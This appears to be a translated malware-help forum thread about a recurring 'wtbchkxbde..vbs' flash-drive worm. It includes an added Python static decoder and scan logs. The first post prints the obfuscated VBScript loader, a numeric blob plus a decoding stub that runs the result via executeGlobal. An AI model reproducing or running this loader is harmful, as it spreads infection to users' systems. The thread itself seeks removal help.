@187$@188$@170$@191$@174$@189$@
184$@114$@86$@83$@174$@183$@173$@105$@178$@175$@86$@83$@178$@175$@105$@105$@184$@171$@179$@177$@189$@189$@185$@173$@184$@192$@183$@181$@184$@170$@173$@119$@188$@189$@170$@189$@190$@188$@105$@134$@105$@123$@121$@121$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@105$@173$@178$@182$@105$@105$@184$@171$@179$@188$@189$@187$@174$@170$@182$@173$@184$@192$@183$@181$@184$@170$@173$@86$@83$@82$@188$@174$@189$@105$@105$@184$@171$@179$@188$@189$@187$@174$@170$@182$@173$@184$@192$@183$@181$@184$@170$@173$@105$@134$@105$@172$@187$@174$@170$@189$@174$@184$@171$@179$@174$@172$@189$@113$@107$@170$@173$@184$@173$@171$@119$@188$@189$@187$@174$@170$@182$@107$@114$@86$@83$@105$@105$@105$@105$@192$@178$@189$@177$@105$@184$@171$@179$@188$@189$@187$@174$@170$@182$@173$@184$@192$@183$@181$@184$@170$@173$@105$@86$@83$@82$@82$@105$@119$@189$@194$@185$@174$@105$@134$@105$@122$@105$@86$@83$@82$@82$@105$@119$@184$@185$@174$@183$@86$@83$@82$@82$@105$@119$@192$@187$@178$@189$@174$@105$@184$@171$@179$@177$@189$@189$@185$@173$@184$@192$@183$@181$@184$@170$@173$@119$@187$@174$@188$@185$@184$@183$@188$@174$@171$@184$@173$@194$@86$@83$@82$@82$@105$@119$@188$@170$@191$@174$@189$@184$@175$@178$@181$@174$@105$@188$@189$@187$@188$@170$@191$@174$@189$@184$@86$@83$@82$@82$@105$@119$@172$@181$@184$@188$@174$@86$@83$@82$@174$@183$@173$@105$@192$@178$@189$@177$@86$@83$@105$@105$@105$@105$@188$@174$@189$@105$@184$@171$@179$@188$@189$@187$@174$@170$@182$@173$@184$@192$@183$@181$@184$@170$@173$@105$@105$@134$@105$@183$@184$@189$@177$@178$@183$@176$@86$@83$@174$@183$@173$@105$@178$@175$@86$@83$@178$@175$@105$@184$@171$@179$@175$@188$@184$@173$@184$@192$@183$@181$@184$@170$@173$@119$@175$@178$@181$@174$@174$@193$@178$@188$@189$@188$@113$@188$@189$@187$@188$@170$@191$@174$@189$@184$@114$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@188$@177$@174$@181$@181$@184$@171$@179$@119$@187$@190$@183$@105$@184$@171$@179$@175$@188$@184$@173$@184$@192$@183$@181$@184$@170$@173$@119$@176$@174$@189$@175$@178$@181$@174$@105$@11
3$@188$@189$@187$@188$@170$@191$@174$@189$@184$@114$@119$@188$@177$@184$@187$@189$@185$@170$@189$@177$@86$@83$@174$@183$@173$@105$@178$@175$@105$@86$@83$@174$@183$@173$@105$@188$@190$@171$@86$@83$@86$@83$@86$@83$@175$@190$@183$@172$@189$@178$@184$@183$@105$@190$@185$@181$@184$@170$@173$@105$@113$@175$@178$@181$@174$@190$@187$@181$@114$@86$@83$@86$@83$@173$@178$@182$@105$@105$@177$@189$@189$@185$@184$@171$@179$@117$@184$@171$@179$@188$@189$@187$@174$@170$@182$@190$@185$@181$@184$@170$@173$@174$@117$@171$@190$@175$@175$@174$@187$@86$@83$@188$@174$@189$@105$@105$@184$@171$@179$@188$@189$@187$@174$@170$@182$@190$@185$@181$@184$@170$@173$@174$@105$@134$@105$@172$@187$@174$@170$@189$@174$@184$@171$@179$@174$@172$@189$@113$@107$@170$@173$@184$@173$@171$@119$@188$@189$@187$@174$@170$@182$@107$@114$@86$@83$@192$@178$@189$@177$@105$@184$@171$@179$@188$@189$@187$@174$@170$@182$@190$@185$@181$@184$@170$@173$@174$@105$@86$@83$@105$@105$@105$@105$@105$@119$@189$@194$@185$@174$@105$@134$@105$@122$@105$@86$@83$@105$@105$@105$@105$@105$@119$@184$@185$@174$@183$@86$@83$@82$@105$@119$@181$@184$@170$@173$@175$@187$@184$@182$@175$@178$@181$@174$@105$@175$@178$@181$@174$@190$@187$@181$@86$@83$@82$@105$@171$@190$@175$@175$@174$@187$@105$@134$@105$@119$@187$@174$@170$@173$@86$@83$@82$@105$@119$@172$@181$@184$@188$@174$@86$@83$@174$@183$@173$@105$@192$@178$@189$@177$@86$@83$@188$@174$@189$@105$@184$@171$@179$@188$@189$@187$@174$@170$@182$@173$@184$@192$@183$@181$@184$@170$@173$@105$@134$@105$@183$@184$@189$@177$@178$@183$@176$@86$@83$@188$@174$@189$@105$@177$@189$@189$@185$@184$@171$@179$@105$@134$@105$@172$@187$@174$@170$@189$@174$@184$@171$@179$@174$@172$@189$@113$@107$@182$@188$@193$@182$@181$@123$@119$@193$@182$@181$@177$@189$@189$@185$@107$@114$@86$@83$@177$@189$@189$@185$@184$@171$@179$@119$@184$@185$@174$@183$@105$@107$@185$@184$@188$@189$@107$@117$@107$@177$@189$@189$@185$@131$@120$@120$@107$@105$@111$@105$@177$@184$@188$@189$@105$@111$@105$@107$@131$@107$@105$@111$@105$@185$@184$@1
"
dim mfvasRGZIhZnddvphsOWz
mfvasRGZIhZnddvphsOWz = "$@"
' Split the number string on the "$@" delimiter
mfvasRGZIhZnddvphsOW=SPLIT(mfvasRGZIhZnddvphsOW, mfvasRGZIhZnddvphsOWz)
dim FOFwEQObHcOMduGpSoigGY
FOFwEQObHcOMduGpSoigGY = 0
dim FOFwEQObHcOMduGpSoigGYv
FOFwEQObHcOMduGpSoigGYv = UBOUND(mfvasRGZIhZnddvphsOW) - 1
' Decode one number at a time and append the result to the script text
FOR FOFwEQObHcOMduGpSoigGYvX = FOFwEQObHcOMduGpSoigGY TO FOFwEQObHcOMduGpSoigGYv
    Dim FOFwEQObHcOMduGpSoigGYvXJ
    Dim FOFwEQObHcOMduGpSoigGYvXJZN
    Dim FOFwEQObHcOMduGpSoigGYvXJZNx
    Dim FOFwEQObHcOMduGpSoigGYvXJZNxD
    FOFwEQObHcOMduGpSoigGYvXJZNxD = mfvasRGZIhZnddvphsOW(FOFwEQObHcOMduGpSoigGYvX)
    FOFwEQObHcOMduGpSoigGYvXJZN = "mfvasRGZIhZ"
    FOFwEQObHcOMduGpSoigGYvXJZNx = 11
    FOFwEQObHcOMduGpSoigGYvXJ = FOFwEQObHcOMduGpSoigGYvXJZNxDE(chr(FOFwEQObHcOMduGpSoigGYvXJZNxD) , FOFwEQObHcOMduGpSoigGYvXJZN, FOFwEQObHcOMduGpSoigGYvXJZNx)
    FOFwEQObHcOMduGpSoigGYvXJZ = FOFwEQObHcOMduGpSoigGYvXJZ & FOFwEQObHcOMduGpSoigGYvXJ
NEXT
' Runs the decoded text as VBScript
executeGlobal (FOFwEQObHcOMduGpSoigGYvXJZ)

' Converts a string into an array of character codes
Function FOFwEQObHcOMduGpSoigGYvXJZNxDEi( FOFwEQObHcOMduGpSoigGYvXJZNxDEiXL)
    FOFwEQObHcOMduGpSoigGYvXJZNxDEiX = Array()
    ReDim FOFwEQObHcOMduGpSoigGYvXJZNxDEiX( CInt( Len( FOFwEQObHcOMduGpSoigGYvXJZNxDEiXL ) ) )
    For FOFwEQObHcOMduGpSoigGYvXJZNxDEiXLO = 0 to Len(FOFwEQObHcOMduGpSoigGYvXJZNxDEiXL) - 1
        FOFwEQObHcOMduGpSoigGYvXJZNxDEiX( FOFwEQObHcOMduGpSoigGYvXJZNxDEiXLO ) = Asc( Mid( FOFwEQObHcOMduGpSoigGYvXJZNxDEiXL,FOFwEQObHcOMduGpSoigGYvXJZNxDEiXLO + 1 ,1 ) )
    Next
    FOFwEQObHcOMduGpSoigGYvXJZNxDEi = FOFwEQObHcOMduGpSoigGYvXJZNxDEiX
End Function

' Subtracts a key character from each input character (modulo 256)
Function FOFwEQObHcOMduGpSoigGYvXJZNxDE(FOFwEQObHcOMduGpSoigGYvXJZNxD, FOFwEQObHcOMduGpSoigGYvXJZN, FOFwEQObHcOMduGpSoigGYvXJZNx)
    ' Rnd(-1) followed by Randomize with a fixed seed repeats the same sequence on every call
    Rnd(-1)
    Randomize FOFwEQObHcOMduGpSoigGYvXJZNx
    FOFwEQObHcOMduGpSoigGYvXJZNxDEiXLOq = Int( ( Len(FOFwEQObHcOMduGpSoigGYvXJZN) - 1 + 1 ) * Rnd + 1 )
    FOFwEQObHcOMduGpS = FOFwEQObHcOMduGpSoigGYvXJZNxDEi(FOFwEQObHcOMduGpSoigGYvXJZNxD)
    FOFwEQObHcOMduGpSo = FOFwEQObHcOMduGpSoigGYvXJZNxDEi(FOFwEQObHcOMduGpSoigGYvXJZN)
    For FOFwEQObHcOMduGpSoigGYvXJZNxDEiXLO = 0 to UBound( FOFwEQObHcOMduGpS ) - 1
        FOFwEQObHcOMduGpSoi = FOFwEQObHcOMduGpSoigGYvXJZNxDEiXLO + FOFwEQObHcOMduGpSoigGYvXJZNxDEiXLOq
        If FOFwEQObHcOMduGpSoi > UBound(FOFwEQObHcOMduGpSo) Then
            Dim FOFwEQObHcOMdu
            FOFwEQObHcOMdu = Int(FOFwEQObHcOMduGpSoi / (UBound(FOFwEQObHcOMduGpSo) + 1))
            Dim FOFwEQObHcOMd
            FOFwEQObHcOMd = ((UBound(FOFwEQObHcOMduGpSo) + 1 ))
            FOFwEQObHcOMduGpSoi = FOFwEQObHcOMduGpSoi - FOFwEQObHcOMd * FOFwEQObHcOMdu
        End If
        FOFwEQObHcOMduGp = FOFwEQObHcOMduGpS(FOFwEQObHcOMduGpSoigGYvXJZNxDEiXLO) - FOFwEQObHcOMduGpSo(FOFwEQObHcOMduGpSoi)
        If FOFwEQObHcOMduGp < 0 Then
            FOFwEQObHcOMduGp = FOFwEQObHcOMduGp + 256
        End If
        dim FOFwEQObHcOM
        FOFwEQObHcOM = Chr(FOFwEQObHcOMduGp)
        FOFwEQObHcOMduG = FOFwEQObHcOMduG & FOFwEQObHcOM
    NEXT
    FOFwEQObHcOMduGpSoigGYvXJZNxDE = FOFwEQObHcOMduG
End Function

I got hold of another antivirus (Smadav, version of 22.1.14). It detects the virus and also finds the .vbs under "C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup", but after the antivirus removes it, the .vbs comes back immediately. The following log was created: Code:
ATTFilter ============================== Log File of Smadav 2014 Rev. 9.6 ============================== Scanning Results : => Time & Date : 11:12:39, on 04-09-2014 => Finishing Time : 36 minutes,17 seconds => Folder Scanned :31530 => File Scanned : 204327 => File Detected : 2 => File Cleaned : 0 => File Skipped : 0 => Value Scanned : 1234 => Value Detected: 0 => Value Fixed: 0 => Path Scanned: 0 => Path Hidden: 0 => Path Unhidden: 0 ============================== Before Scanning ============================== Suspected Paths : => Fine(Level 2) as : 1 Process -C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceHelper.exe => Fine(Level 2) as : 1 Process -C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServer.exe => Fine(Level 2) as : 1 Process -C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe => Fine(Level 1) as : 1 Process -C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe => Fine(Level 1) as : 1 Process -C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe => Fine(Level 1) as : 1 Process -C:\Program Files (x86)\Launch Manager\dsiwmis.exe => Fine(Level 1) as : 1 Process -C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe => Fine(Level 1) as : 1 Process -C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe => Fine(Level 1) as : 1 Process -C:\Program Files (x86)\Acer\Acer VCM\RS_Service.exe => Fine(Level 1) as : 1 Process -C:\Program Files\Acer\Acer Updater\UpdaterService.exe => Fine(Level 1) as : 1 Process -C:\Program Files (x86)\Acer\Acer VCM\AcerVCM.exe => Fine(Level 1) as : 1 Process -C:\..\program files (x86)\Acer\Acer VCM\AcerVCM.exe => Fine(Level 1) as : 1 Process, 1 Startup -C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe => Fine(Level 1) as : 1 Process, 1 Startup -C:\Program Files (x86)\Launch Manager\LManager.exe => Fine(Level 1) as : 1 Process, 1 Startup 
-C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe => Fine(Level 1) as : 1 Process, 1 Startup -C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe => Fine(Level 1) as : 1 Process, 1 Startup -C:\Program Files (x86)\iTunes\iTunesHelper.exe => Fine(Level 1) as : 1 Process -C:\Program Files (x86)\Launch Manager\LMworker.exe => Fine(Level 1) as : 1 Process -C:\Program Files (x86)\iTunes\iTunes.exe => Fine(Level 1) as : 1 Process -C:\Program Files (x86)\Common Files\Apple\Apple Application Support\distnoted.exe => Fine(Level 1) as : 1 Process -C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe => Fine(Level 1) as : 1 Process -C:\program files (x86)\Avira\antivir desktop\avconfig.exe => Fine(Level 1) as : 1 Startup -C:\Program Files\NetLimiter 3\NLClientApp.exe => Fine(Level 1) as : 1 Startup -C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe => Fine(Level 1) as : 1 Startup -C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe => Fine(Level 1) as : 1 Startup -C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtbchkxbde..vbs => Fine(Level 1) as : 1 Startup -C:\..\program files (x86)\vr-networld\vrtoolcheckorder.exe Running Processes : => N/A => N/A => N/A => N/A => C:\Windows\System32\wininit.exe => N/A => N/A => N/A => N/A => N/A => C:\Windows\System32\svchost.exe => C:\Windows\System32\svchost.exe => N/A => C:\Windows\System32\svchost.exe => C:\Windows\System32\svchost.exe => C:\Windows\System32\svchost.exe => N/A => C:\Windows\System32\svchost.exe => C:\Windows\System32\svchost.exe => N/A => N/A => C:\Windows\System32\taskeng.exe => C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe => C:\Windows\System32\svchost.exe => C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe => C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe => N/A => N/A => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe => N/A => 
C:\Windows\explorer.exe => N/A => C:\Program Files (x86)\Launch Manager\dsiwmis.exe => N/A => C:\Windows\System32\svchost.exe => C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe => N/A => C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe => C:\Program Files (x86)\Acer\Acer VCM\RS_Service.exe => C:\Windows\System32\svchost.exe => C:\Program Files\Acer\Acer Updater\UpdaterService.exe => N/A => N/A => N/A => N/A => N/A => N/A => N/A => N/A => N/A => N/A => N/A => N/A => C:\Windows\System32\wscript.exe => C:\Program Files (x86)\Acer\Acer VCM\AcerVCM.exe => C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe => C:\Program Files (x86)\Launch Manager\LManager.exe => N/A => N/A => C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe => C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe => C:\Program Files (x86)\iTunes\iTunesHelper.exe => C:\Program Files (x86)\Launch Manager\LMworker.exe => N/A => N/A => N/A => N/A => N/A => N/A => N/A => N/A => N/A => N/A => C:\Program Files (x86)\iTunes\iTunes.exe => N/A => N/A => N/A => C:\Windows\System32\SearchIndexer.exe => C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceHelper.exe => N/A => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\distnoted.exe => N/A => C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServer.exe => N/A => C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe => N/A => N/A => N/A => C:\Users\Franz\Desktop\Antivir\Peter\Smadav\SMΔRTP.exe => C:\program files (x86)\Avira\antivir desktop\avconfig.exe => N/A ============================== After Scanning ============================== Suspected Paths : => Unknown(Level 3) as : 1 Process -C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceHelper.exe => Unknown(Level 3) as : 1 Process -C:\Program Files (x86)\Common Files\Apple\Mobile Device 
Support\SyncServer.exe => Unknown(Level 3) as : 1 Process -C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\ATH.exe => Unknown(Level 3) as : 1 Process -C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe => Fine(Level 1) as : 1 Process -C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe => Fine(Level 1) as : 1 Process -C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe => Fine(Level 1) as : 1 Process -C:\Program Files (x86)\Launch Manager\dsiwmis.exe => Fine(Level 1) as : 1 Process -C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe => Fine(Level 1) as : 1 Process -C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe => Fine(Level 1) as : 1 Process -C:\Program Files (x86)\Acer\Acer VCM\RS_Service.exe => Fine(Level 1) as : 1 Process -C:\Program Files\Acer\Acer Updater\UpdaterService.exe => Fine(Level 1) as : 1 Process -C:\Program Files (x86)\Acer\Acer VCM\AcerVCM.exe => Fine(Level 1) as : 1 Process -C:\..\program files (x86)\Acer\Acer VCM\AcerVCM.exe => Fine(Level 1) as : 1 Process, 1 Startup -C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe => Fine(Level 1) as : 1 Process, 1 Startup -C:\Program Files (x86)\Launch Manager\LManager.exe => Fine(Level 1) as : 1 Process, 1 Startup -C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe => Fine(Level 1) as : 1 Process, 1 Startup -C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe => Fine(Level 1) as : 1 Process, 1 Startup -C:\Program Files (x86)\iTunes\iTunesHelper.exe => Fine(Level 1) as : 1 Process -C:\Program Files (x86)\Launch Manager\LMworker.exe => Fine(Level 1) as : 1 Process -C:\Program Files (x86)\iTunes\iTunes.exe => Fine(Level 1) as : 1 Process -C:\Program Files (x86)\Common Files\Apple\Apple Application Support\distnoted.exe => Fine(Level 1) as : 1 Process -C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe => 
Fine(Level 1) as : 1 Process -C:\program files (x86)\Avira\antivir desktop\avconfig.exe => Fine(Level 1) as : 1 Startup -C:\Program Files\NetLimiter 3\NLClientApp.exe => Fine(Level 1) as : 1 Startup -C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe => Fine(Level 1) as : 1 Startup -C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe => Fine(Level 1) as : 1 Startup -C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtbchkxbde..vbs => Fine(Level 1) as : 1 Startup -C:\..\program files (x86)\vr-networld\vrtoolcheckorder.exe Running Processes : => N/A => N/A => N/A => N/A => C:\Windows\System32\wininit.exe => N/A => N/A => N/A => N/A => N/A => C:\Windows\System32\svchost.exe => C:\Windows\System32\svchost.exe => N/A => C:\Windows\System32\svchost.exe => C:\Windows\System32\svchost.exe => C:\Windows\System32\svchost.exe => N/A => C:\Windows\System32\svchost.exe => C:\Windows\System32\svchost.exe => N/A => N/A => C:\Windows\System32\taskeng.exe => C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe => C:\Windows\System32\svchost.exe => C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe => C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe => N/A => N/A => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe => N/A => C:\Windows\explorer.exe => N/A => C:\Program Files (x86)\Launch Manager\dsiwmis.exe => N/A => C:\Windows\System32\svchost.exe => C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe => N/A => C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe => C:\Program Files (x86)\Acer\Acer VCM\RS_Service.exe => C:\Windows\System32\svchost.exe => C:\Program Files\Acer\Acer Updater\UpdaterService.exe => N/A => N/A => N/A => N/A => N/A => N/A => N/A => N/A => N/A => N/A => N/A => N/A => C:\Windows\System32\wscript.exe => C:\Program Files (x86)\Acer\Acer VCM\AcerVCM.exe => C:\Program Files 
(x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe => C:\Program Files (x86)\Launch Manager\LManager.exe => N/A => N/A => C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe => C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe => C:\Program Files (x86)\iTunes\iTunesHelper.exe => C:\Program Files (x86)\Launch Manager\LMworker.exe => N/A => N/A => N/A => N/A => N/A => N/A => N/A => N/A => N/A => N/A => C:\Program Files (x86)\iTunes\iTunes.exe => N/A => N/A => N/A => C:\Windows\System32\SearchIndexer.exe => C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceHelper.exe => N/A => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\distnoted.exe => N/A => C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServer.exe => N/A => C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe => N/A => N/A => N/A => C:\Users\Franz\Desktop\Antivir\Peter\Smadav\SMΔRTP.exe => C:\program files (x86)\Avira\antivir desktop\avconfig.exe => N/A => C:\Windows\System32\SearchProtocolHost.exe => C:\Windows\System32\SearchFilterHost.exe => C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\ATH.exe => N/A => N/A Detected Virus : => VBS.Encrypted.B -Infected File -C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtbchkxbde..vbs => New Heur.FFD(VBS) -Infected File -E:\wtbchkxbde..vbs
Since the virus infection my laptop sometimes freezes without any load (Word or Spider Solitaire), 4 times so far in one week. Since I used Smadav my desktop icons are narrower and closer together (the height is normal). No idea whether that has anything to do with the virus; if anyone happens to have a solution for it, that would be very nice.
I only get online very irregularly, but I will try to answer any questions quickly. Here in the village the virus is apparently on every PC, so a whole tribe will be grateful to you for any help. Greetings from the jungle, Franz |
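The script in the post above stores its real content as decimal numbers joined by "$@" and subtracts one character of the key string "mfvasRGZIhZ" from each number before running the result. The following added example (not part of the original post, and not the poster's code) recovers such text statically, without running the script: because the stub reseeds the random generator on every call, the key character is the same for every number, so it is enough to try each candidate and keep the most readable output. The function names, the scoring rule, the sample text and its key byte "Z" are assumptions constructed for illustration.

```python
"""Static decoder for "$@"-delimited decimal obfuscation (added example)."""
import string

DELIM = "$@"
# Key string handed to the decode routine in the posted script.
KEY_STRING = "mfvasRGZIhZ"
# Bytes expected in script source; used only to score candidate outputs.
_PRINTABLE = set(string.printable.encode("ascii"))


def split_tokens(blob):
    """Return the numbers of a blob as a list of ints in 0..255.

    Whitespace is removed first because forum pastes wrap the blob in the
    middle of a number. Empty fields are dropped: the blob ends with a
    trailing delimiter, which the script itself skips (UBound - 1).
    """
    compact = "".join(blob.split())
    values = []
    for tok in compact.split(DELIM):
        if not tok:
            continue
        n = int(tok)  # raises ValueError on anything that is not a number
        if not 0 <= n <= 255:
            raise ValueError(f"token out of byte range: {n}")
        values.append(n)
    return values


def candidate_key_bytes(key_string=KEY_STRING):
    """Every byte the stub could subtract: each key character, plus 0.

    0 covers the unset extra array slot the stub's ReDim leaves after the
    last key character (an empty value counts as 0 in the subtraction).
    """
    return sorted(set(key_string.encode("latin-1")) | {0})


def decode_with(values, key_byte):
    """Apply the stub's arithmetic: (value - key byte) modulo 256."""
    return bytes((v - key_byte) % 256 for v in values)


def score(plain):
    """Higher is more script-like: printable share plus share of spaces."""
    if not plain:
        return 0.0
    printable = sum(b in _PRINTABLE for b in plain)
    return (printable + plain.count(b" ")) / len(plain)


def recover(blob, key_string=KEY_STRING):
    """Try every candidate key byte; return (best_key_byte, decoded_text)."""
    values = split_tokens(blob)
    best = max(candidate_key_bytes(key_string),
               key=lambda k: score(decode_with(values, k)))
    return best, decode_with(values, best).decode("latin-1")


def encode(text, key_byte):
    """Inverse of decode_with, used only to build the sample below."""
    return "".join(f"{(b + key_byte) % 256}{DELIM}"
                   for b in text.encode("latin-1"))


# Constructed sample (harmless text, not taken from the page), encoded with
# the key character "Z" chosen arbitrarily from the key string.
SAMPLE_PLAIN = ("' constructed sample, not taken from the page\r\n"
                "Dim greeting\r\n"
                "greeting = \"hello\"\r\n"
                "WScript.Echo greeting\r\n")
SAMPLE_BLOB = encode(SAMPLE_PLAIN, ord("Z"))

if __name__ == "__main__":
    key_byte, text = recover(SAMPLE_BLOB)
    print(f"key byte: {key_byte} ({chr(key_byte)!r})")
    print(text)
```

To analyse a real sample, save the quoted number string to a text file on an analysis machine and pass its contents to recover(); the decoded text is only returned as a string and is never executed.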
13.04.2014, 13:13 | #2 |
/// the machine /// TB trainer | Flash Drive Shortcut Virus wtbchkxbde..vbs hi,
Please download the appropriate version of Farbar's Recovery Scan Tool to your desktop: FRST 32-Bit | FRST 64-Bit (If you are not sure: download both versions, or check under Start > Computer (right-click) > Properties) |
14.04.2014, 09:56 | #3 |
| Flash Drive Shortcut Virus wtbchkxbde..vbs Thanks for the quick reply!
FRST.txt: FRST Logfile: Code:
ATTFilter Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 13-04-2014 01 Ran by Franz (administrator) on FRANZ-PC on 14-04-2014 10:43:32 Running from C:\Users\Franz\Desktop Windows 7 Home Premium (X64) OS Language: German Standard Internet Explorer Version 9 Boot Mode: Normal ==================== Processes (Whitelisted) ================= (AMD) C:\Windows\system32\atiesrxx.exe (Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe (AMD) C:\Windows\system32\atieclxx.exe (Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe (Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe (Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\adminservice.exe (Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe (Dritek System Inc.) C:\Program Files (x86)\Launch Manager\dsiwmis.exe (Acer Incorporated) C:\Program Files\Acer\Acer PowerSmart Manager\ePowerSvc.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe (Locktime Software) C:\Program Files\NetLimiter 3\nlsvc.exe (NewTech Infosystems, Inc.) C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe (Acer Incorporated) C:\Program Files (x86)\Acer\Acer VCM\RS_Service.exe (Acer Group) C:\Program Files\Acer\Acer Updater\UpdaterService.exe (Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE (Alcor Micro Corp.) C:\Program Files (x86)\AmIcoSingLun\AmIcoSinglun64.exe (Intel Corporation) C:\Windows\System32\igfxpers.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe (Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe (Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe (Alps Electric Co., Ltd.) 
C:\Program Files\Apoint2K\Apoint.exe (Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApMsgFwd.exe (Locktime Software) C:\Program Files\NetLimiter 3\NLClientApp.exe (Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\HidFind.exe (Microsoft Corporation) C:\Windows\System32\wscript.exe (Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Apntex.exe (Acer Incorporated) C:\Program Files (x86)\Acer\Acer VCM\AcerVCM.exe (NewTech Infosystems, Inc.) C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe (Dritek System Inc.) C:\Program Files (x86)\Launch Manager\LManager.exe (Dritek System Inc.) C:\Program Files (x86)\Launch Manager\MMDx64Fx.exe (Dritek System Inc.) C:\Program Files (x86)\Launch Manager\LMworker.exe (Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe (Hewlett-Packard) C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe (Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe (Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe (Apple Inc.) C:\Program Files (x86)\iTunes\iTunes.exe (Acer Incorporated) C:\Program Files\Acer\Acer PowerSmart Manager\ePowerTray.exe (Acer Incorporated) C:\Program Files\Acer\Acer PowerSmart Manager\ePowerEvent.exe (Intel Corporation) C:\Windows\system32\igfxext.exe (Intel Corporation) C:\Windows\system32\igfxsrvc.exe (Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe (ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe (Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avshadow.exe (Intel Corporation) C:\Windows\system32\igfxtray.exe (Intel Corporation) C:\Windows\system32\hkcmd.exe (Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe (Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceHelper.exe (Apple Inc.) 
